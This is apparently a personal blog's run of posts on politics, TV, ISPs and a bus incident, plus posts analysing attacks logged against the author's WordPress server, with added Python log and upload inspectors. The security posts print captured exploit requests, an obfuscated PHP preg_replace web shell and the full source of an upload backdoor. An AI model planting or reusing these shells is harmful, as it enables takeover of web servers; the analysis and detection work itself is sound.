Indiana state trooper pulls woman over and asks “Do you accept Jesus Christ as your savior?”

A lot of Christians criticized me when I pointed out that WranglerStar, a YouTube content creator, should keep his religious views to himself after he spent the last minute of a six minute, ostensibly secular, video proselytizing.

While that person's behavior was inappropriate, the behavior of Indiana State Police Trooper Brian Hamilton is so egregious he should be fired immediately. According to this Daily Kos story, Trooper Hamilton used his position of power to proselytize for his religion after stopping a motorist for a chicken-shit offense for which he issued a verbal warning. While detaining the motorist he asked multiple questions unrelated to the traffic infraction; for example, “Did she accept Jesus Christ as her savior?” He also handed the driver a pamphlet from his preferred church. Holy shit! What motorist in the same situation would not feel intimidated into providing the answers Trooper Hamilton wanted to hear rather than telling him it’s none of his fucking business?

Fortunately the ACLU has filed a lawsuit.

Updated 2015-10-18: Sigh. This story is a year old. I really, really, hate it when an otherwise reputable site like Daily Kos doesn’t make it clear that they’re talking about ancient history.

I had to scroll to the seventh page of Google search results to find this link to PacerMonitor.com that provides some details about the lawsuit. It says the case terminated 2015-04-03 but provides no details regarding the disposition of the lawsuit.

After a lot of searching the only web page I could find that was not about the original incident and dated October 2014 was this article dated 2015-09-24. It talks about an accident to which Cpl. Brian Hamilton gave an official statement. Is that the same Brian Hamilton that was working for the Indiana State Police a year earlier? I would bet it is the same individual but the name is common enough that it could be coincidence. So, as all too often happens, it appears a “bad apple” simply moved from one police department to another.

Regular expressions: “Now you have two problems”

I’ve used the Zsh shell as my primary command line and scripting shell for the past seven years, and before that Korn shell for over a decade. Recently on the zsh-users mailing list someone asked for help, which resulted in a recommendation to use a negative look-ahead regular expression.

Mikael Magnusson correctly pointed out:

As a sidenote, (^foo)* is always useless to write,
since (^foo) will expand to the empty string, and then
the * will consume anything else. A useful way to think
of (^foo) is a * that will exclude any matches that
don't match the pattern foo.

To which I replied that people should Google “regular expression negative lookahead”, which will turn up numerous articles citing Jamie Zawinski’s observation:

Some people, when confronted with a problem, think “I know, I’ll use regular expressions.” Now they have two problems.

I wholeheartedly agree with that sentiment, notwithstanding the fact that I still employ regular expressions every single day. The important thing is that I avoid them outside of ad-hoc interactive searches unless I have expended considerable thought on their correctness and on their failure modes when handed malformed input.

Watch Netflix’s “Black Mirror” if you like “Orphan Black”

I just binge watched the first two seasons of the British TV program Black Mirror on Netflix. If you liked Orphan Black you should definitely watch Black Mirror. Fuck that. You should watch Black Mirror even if you didn’t like Orphan Black.

Each episode of Black Mirror stands alone and is completely unrelated to the other episodes. Unrelated other than the fact that each one will make you think about how we interact with each other and with technology. Every single episode made me think about my own interactions with technology (e.g., the smart phone most of us carry with us 24/7). Not to mention my own base instincts about retributive justice or what it means to interact with someone I love.

Very few TV shows have affected me as deeply as Black Mirror. A similar TV series which was too short lived was The Booth at the End on Hulu.

Thailand has reached #1 in attacks against my server

The number of attacks from Thailand has been a significant fraction of the total for several months. In the past 24 hours I saw attacks from 51 addresses in Thailand, 241 in the past week. That exceeds the runner-up country (US) by a factor of five. Ten months ago I noted that Italy was the source of a disproportionate number of attacks.

Every single recent attack from Thailand has attempted to register a bogus WordPress account via a POST /wp-login.php?action=register request. Some piece of malware has managed to successfully infect a huge number of personal computers in Thailand and nowhere else. All of the computers are in the totbb.net domain.

Below is the most recent such request. The details of the user login and email vary but the other details are pretty consistent.

P.S., I recognize that the numbers I’m reporting are insignificant compared to most web servers, let alone the Internet as a whole. But that’s the point. My web server (blog) is only a little over a year old and is itself insignificant, which means I have relatively little traffic to wade through, which in turn makes detecting some problems and trends easier.

POST /wp-login.php?action=register HTTP/1.1
Host: www.skepticism.us
Cookie: wordpress_test_cookie=WP+Cookie+check
Connection: Keep-Alive
User-Agent: Opera/9.80 (Windows NT 6.2; Win64; x64) Presto/2.12.388 Version/12.17
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: en
Accept-Encoding: gzip, deflate
Referer: http://www.skepticism.us/wp-login.php?action=register
Content-Type: application/x-www-form-urlencoded
Content-Length: 109

user_login=PattiThorne3&user_email=pattisabj9571%40admin2%40metalchopsaw.info&redirect_to=&wp-submit=Register
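As an added example (not from this post and not WordPress code), here is Python that pulls the registration POSTs described above out of Apache combined-format access log lines, counts them per source address and per User-Agent, and flags sources either by attempt count or by a reverse-DNS suffix. The log lines, the reverse-DNS table, the documentation-range addresses and the threshold are all constructed for the example.

```python
import re
from collections import Counter

# Apache combined log format; lines that do not fit are skipped rather than guessed at.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')

def parse_line(line):
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None

def is_register_post(rec):
    """The POST /wp-login.php?action=register shape every Thai source in the post used."""
    path, _, query = rec["target"].partition("?")
    return rec["method"] == "POST" and path == "/wp-login.php" and "action=register" in query.split("&")

def registration_sources(log_text):
    """Count registration POSTs per source IP and per User-Agent string."""
    by_ip, by_ua = Counter(), Counter()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and is_register_post(rec):
            by_ip[rec["ip"]] += 1
            by_ua[rec["ua"]] += 1
    return by_ip, by_ua

def flag_sources(by_ip, resolve, suffix=".totbb.net", threshold=2):
    """IPs with >= threshold attempts, or whose reverse name ends in suffix.
    resolve(ip) -> hostname or None; a dict lookup here, socket.gethostbyaddr in practice."""
    return sorted(ip for ip, n in by_ip.items()
                  if n >= threshold or (resolve(ip) or "").endswith(suffix))

# Constructed sample lines (documentation addresses, not the post's real sources).
UA = "Opera/9.80 (Windows NT 6.2; Win64; x64) Presto/2.12.388 Version/12.17"
SAMPLE_LOG = "\n".join([
    '203.0.113.10 - - [17/Oct/2015:10:01:02 +0000] "POST /wp-login.php?action=register HTTP/1.1" 200 512 "-" "%s"' % UA,
    '203.0.113.11 - - [17/Oct/2015:10:03:44 +0000] "POST /wp-login.php?action=register HTTP/1.1" 200 512 "-" "%s"' % UA,
    '203.0.113.10 - - [17/Oct/2015:10:05:09 +0000] "POST /wp-login.php?action=register HTTP/1.1" 200 512 "-" "%s"' % UA,
    '198.51.100.7 - - [17/Oct/2015:10:06:00 +0000] "GET /2015/10/ HTTP/1.1" 200 8192 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [17/Oct/2015:10:06:30 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    'garbage line that does not parse',
])
# Constructed reverse-DNS table standing in for gethostbyaddr().
RDNS = {"203.0.113.11": "host-203-0-113-11.example.totbb.net", "198.51.100.7": "crawler.example.net"}
```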

VPS/cloud provider soladrive.com has no working abuse or support email

Today my server was attacked by a server owned by soladrive.com; specifically IP addr 96.44.156.75 (which is also owned by quadranet.com). I sent a report of the attack to abuse@soladrive.com. That email was rejected with this text:

  pipe to |/home/sola/public_html/support/pipe/pipe.php
    generated by abuse@soladrive.com
    local delivery failed

I then forwarded that to support@soladrive.com — the address I found on their web page. That also bounced with the same error. WTF! Why would anyone use a VPS provider without a working abuse email address? Oh, right. They use companies like this because they don’t give a shit about security or abuse from their network.

Shortly after writing the above text I sent an email to sales@soladrive.com which is also on their public web page as a point of contact. It too bounced with the same error. Jebus H Christus. The people running Soladrive.com appear to be morons.

An alcoholic on the bus ride home tonight… WTF is wrong with our mental health support network

I rode the bus this afternoon to assist the San Jose Downtown Streets Team in putting homeless people back to work. On the bus ride back home I noticed an individual on the bus I initially thought was blind and/or mentally handicapped. But a few minutes after I boarded he started shouting seemingly random phrases. He then made several random seating changes (while showing us his lovely butt crack).

Soon after that he slowly took off his pants. While doing so the bus driver calmly told him to put his pants back on. The rider then stood up (completely naked from the waist down) and slowly put on shorts. The bus driver pulled over at the next stop and could be seen talking to his dispatcher. The rider then moved to the very back of the bus where I observed him drinking what appeared to be straight vodka while intermittently spitting and drooling on the floor. I suspect the alcoholic had pissed himself, thus prompting the change of pants.

The bus driver was very polite to the alcoholic and told him the sheriff would be arriving soon and he could wait on the bus or on the sidewalk. The alcoholic chose to wait on the bus. At which point the driver suggested to the rest of us that we should consider changing to the next route #22 bus that was about to arrive at our location.

The bus driver should be commended for an excellent job in handling a difficult and uncomfortable situation. I wish I had stayed to observe how the police handled the situation. I hope the police exhibited the same professionalism and compassion shown by the bus driver but I would be surprised if they did so. Hopefully this person will get some help for his addiction but I doubt that will happen given that our state run mental health programs have been underfunded for decades.

Is it just Comcast or do all broadband cable ISPs suck?

Yesterday I had my second Internet outage in the less than three months since I switched to Comcast cable broadband as my ISP. The first incident was a little less than two months ago when my IPv6 address changed for no reason and hardware and software connecting me to the Internet failed to handle the situation. In the preceding seven years using AT&T + Sonic.net I had exactly two Internet outages and one of those was because my DSL modem died.

In the middle of watching a film via my AppleTV device I lost connectivity to the Internet. Absolutely nothing worked. I couldn’t resolve host names or ping well known addresses from my Mac Pro server. I had to power-cycle my cable modem (a Netgear CM400 less than three months old) to restore service. I didn’t time it precisely but I allowed at least 15 minutes for the problem to resolve itself in case it was a transient issue before I intervened.

If I’m going to have to manually intervene every month or two to restore connectivity to the Internet I’m going to be one very pissed off Comcast customer. This is not bleeding edge technology. These sorts of problems are not acceptable given the maturity of the technology.

Another interesting attack against the “beauty-clean” WP theme

Today I logged another attack that attempts to exploit the horribly broken (i.e., full of security holes) “beauty-clean” WordPress theme. It also exploits a misfeature of PHP that is one of hundreds of reasons that PHP needs to die. Anyone who tells me they’re proud they write most of their code in PHP is someone who probably received way too many awards as a child merely for participating.

I wrote about the first attack I noticed against this theme just two weeks ago. This most recent attack is similar yet different. It leverages the fact that the WP theme creates a temporary file using the filename provided by the attacker and then doesn’t remove the file.

POST / HTTP/1.1
Referer: http://www.skepticism.us
User-Agent: Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0
Accept: */*
Content-Type: multipart/form-data; boundary=(UploadBoundary)
Host: www.skepticism.us
Content-Length: 409
Connection: Close

--(UploadBoundary)
Content-Disposition: form-data; name="yiw_contact[]"; filename="resd.php"
Content-Type: text/php

<?php $hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";$hh("/[discuz]/e",$_POST['h'],"Access");?>45000
--(UploadBoundary)
Content-Disposition: form-data; name="yiw_action"

sendemail
--(UploadBoundary)
Content-Disposition: form-data; name="id_form"

a_3_3
--(UploadBoundary)

Here is the PHP program the hacker is attempting to install on my system:

$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";$hh("/[discuz]/e",$_POST['h'],"Access");

Notice the childish attempt at obfuscating the code. Removing the obfuscation we get:

preg_replace("/[discuz]/e", $_POST['h'], "Access");

OMFG! It’s going to execute whatever PHP code the attacker passes via an “h” POST parameter four times: once for each occurrence of the letters “c” and “s” in the word “Access”. So not only is the person who wrote the “beauty-clean” theme incompetent, so is this hacker.

Let’s treat gun owners like we treat pregnant women

This is making the rounds but can’t be repeated often enough, so…

The text from the image (so it’s searchable):

“Gun violence problem solved. Or, “hey, how about we treat every young man who wants to buy a gun like every woman who wants to get an abortion” — mandatory 48-hr waiting period, parental permission, a note from his doctor proving he understands what he’s about to do, a video he has to watch about the effects of gun violence, an ultrasound wand up the ass (just because). Let’s close down all but one gun shop in every state and make him travel hundreds of miles, take time off work, and stay overnight in a strange town to get a gun. Make him walk through a gauntlet of people holding photos of loved ones who were shot to death, people who call him a murderer and beg him not to buy a gun.

It makes more sense to do this with young men and guns than with women and health care, right? I mean, no woman getting an abortion has killed a room full of people in seconds, right?” — via a friend of a friend

The malware a recent attack against the WordPress revslider plugin attempted to install

I’ve been seeing attempts to exploit bugs in the WordPress revslider plugin for a very long time. But all of the attacks that utilize a POST request have attempted to upload a Zip archive. And a bug in the mod_dumpio module meant I was unable to extract the contents of those zip files. Having just fixed the mod_dumpio module I was able to capture one of those zip archives. The attack was from a server at namecheaphosting.com (I’ve elided the binary zip data):

POST /tag/php/wp-admin/admin-ajax.php HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: www.skepticism.us
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:24.0) Gecko/20100101 Firefox/24.0
Content-Length: 1122
Content-Type: multipart/form-data; boundary=xYzZY
Cookie:

--xYzZY
Content-Disposition: form-data; name="action"

revslider_ajax_action
--xYzZY
Content-Disposition: form-data; name="client_action"

update_plugin
--xYzZY
Content-Disposition: form-data; name="update_file"; filename="revslider.zip"
Content-Type: application/zip

PK…
--xYzZY--

The uploaded zip file contained a single file, revslider/dor.libs.php, with the following content. As you can see, it’s a poorly written minimalist backdoor.

<?php
echo "<title>RevSlideR 2015</title><br><br>";
$win = strtolower(substr(PHP_OS,0,3)) == "win";
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
{
 $safemode = true;
 $hsafemode = "4,1ON(BuSuX)";
}
else {$safemode = false; $hsafemode = "OFF(WoKeH)";}
$os = wordwrap(php_uname(),90,"<br>",1);
$xos = "Safe-mode:[Safe-mode:".$hsafemode."] 7 [OS:".$os."]";
echo "<center> ".$xos." </center><br>";

if(isset($_GET['x'])){
echo "<title>PiNDaH 2015</title><br><br>";
$source = $_SERVER['SCRIPT_FILENAME'];
$desti =$_SERVER['DOCUMENT_ROOT']."/default.php";
copy($source, $desti);
}

echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
        if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; }
        else { echo '<b>Upload GAGAL !!!</b><br><br>'; }
}
?>
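Added example, not code from this blog, the “beauty-clean” theme or the revslider plugin: a Python inspector for multipart upload bodies such as the beauty-clean request in the earlier post and the revslider zip upload above. It flags a part that carries a PHP filename, a PHP open tag, a preg_replace pattern with the /e modifier (after undoing the "p"."r"."e" concatenation trick), a read of request input, or a zip archive whose PHP members show the same tells. The sample body is constructed from the captured beauty-clean request; the indicator list is my own heuristic, not a complete web-shell signature.

```python
import io, re, zipfile

PHP_EXT = re.compile(r"\.ph(?:p\d?|tml|ar)$", re.I)
E_MODIFIER = re.compile(r'"/.*?/[A-Za-z]*e[A-Za-z]*"')  # PCRE literal carrying the /e (eval) flag
SUPERGLOBAL = re.compile(r"\$_(?:POST|GET|REQUEST|FILES)\b")

def parse_multipart(body, boundary):
    """Split a multipart/form-data body into (headers, content) pairs (no value decoding)."""
    parts = []
    for chunk in body.split(b"--" + boundary.encode())[1:]:
        if chunk.startswith(b"--") or not chunk.strip():  # closing delimiter or empty tail
            continue
        head, _, content = chunk.lstrip(b"\r\n").partition(b"\r\n\r\n")
        headers = dict(
            (k.strip().lower(), v.strip())
            for k, _, v in (line.partition(":") for line in head.decode("latin-1").split("\r\n")))
        parts.append((headers, content.rstrip(b"\r\n")))
    return parts

def php_indicators(text):
    """Static tells in a blob of (possibly obfuscated) PHP source."""
    code = re.sub(r'"\s*\.\s*"', "", text)  # undo "p"."r"."e"-style concatenation
    found = []
    if "<?php" in code or "<?=" in code:
        found.append("php open tag")
    if "preg_replace" in code and E_MODIFIER.search(code):
        found.append("preg_replace with /e modifier")
    if SUPERGLOBAL.search(code):
        found.append("reads request input")
    return found

def inspect_part(headers, content):
    """Reasons (possibly empty) why one part looks like an attempt to drop PHP on the server."""
    m = re.search(r'(?<!\w)filename="([^"]*)"', headers.get("content-disposition", ""))
    reasons = ["php filename " + m.group(1)] if m and PHP_EXT.search(m.group(1)) else []
    if content.startswith(b"PK\x03\x04"):  # zip upload, as in the revslider request
        with zipfile.ZipFile(io.BytesIO(content)) as z:
            for member in filter(PHP_EXT.search, z.namelist()):
                reasons.append("zip member %s: %s" % (member, ", ".join(php_indicators(z.read(member).decode("latin-1")))))
    else:
        reasons += php_indicators(content.decode("latin-1"))
    return reasons

# Constructed body modelled on the beauty-clean request, with the CRLF line endings used on the wire.
SAMPLE_BODY = (b'--(UploadBoundary)\r\nContent-Disposition: form-data; name="yiw_contact[]"; filename="resd.php"\r\n'
               b'Content-Type: text/php\r\n\r\n<?php $hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";'
               b'$hh("/[discuz]/e",$_POST[\'h\'],"Access");?>45000\r\n--(UploadBoundary)\r\n'
               b'Content-Disposition: form-data; name="yiw_action"\r\n\r\nsendemail\r\n--(UploadBoundary)--\r\n')
```

Run `inspect_part(*part)` over each element of `parse_multipart(SAMPLE_BODY, "(UploadBoundary)")`; only the resd.php part produces reasons.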